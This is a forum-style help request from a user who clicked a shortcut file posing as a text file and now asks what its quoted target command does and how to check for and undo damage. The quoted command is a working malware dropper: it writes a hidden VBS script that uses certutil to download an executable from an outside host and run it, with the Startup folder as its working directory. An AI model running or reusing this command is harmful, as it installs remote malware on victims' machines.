I received a link file masquerading as a text file. By mistake I had clicked that and suddenly a command prompt opened. Surprised at the unexpected behavior I closed that window. Upon inspecting the file, it had .lnk extension. While normal .lnk file has few byte size, this one was few hundred MB.
Inspecting the details of the .lnk file, it had in the target field the following command
%ComSpec% /c echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""&certutil -urlcache -f https://coid.xyz/?di1708e9xmgN9OFQ=amusers_%PROCESSOR_ARCHITECTURE% ""%USERNAME%.exe""&&""%USERNAME%.exe""",0 >"%USERNAME%.vbs"&"%USERNAME%.vbs"
While the start in field had
"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
Need some help in understanding what does this code fragment do, and if possible how to check if anything bad has happened and how to undo the changes.
Windows 8 system, if any way relevant. Let me know if any other information is needed.
